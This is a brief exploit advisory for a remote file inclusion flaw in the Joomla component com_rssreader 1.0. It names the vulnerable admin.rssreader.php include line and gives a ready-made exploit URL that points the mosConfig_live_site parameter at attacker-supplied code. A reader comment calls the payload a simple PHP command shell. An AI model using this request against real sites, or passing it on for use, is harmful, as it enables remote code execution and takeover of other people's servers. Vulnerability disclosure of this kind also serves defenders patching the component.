Simple RSS Reader 1.0 - RFI


[o] Simple RSS Reader Component 1.0 Remote File Inclusion Vulnerability
Software : com_rssreader version 1.0
Vendor : http://www.joomlashop.dk/
Download : http://extensions.joomlashop.dk/index.php?option=com_docman&task=cat_view&gid=16&Itemid=47
Author : NoGe


[o] Vulnerable file
administrator/components/com_rssreader/admin.rssreader.php
include( "$mosConfig_live_site/components/com_rssreader/about.html" );


[o] Exploit
http://localhost/[path]/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=[evilcode]


One Response so far.

  1. That script is simple cmd script writen in php.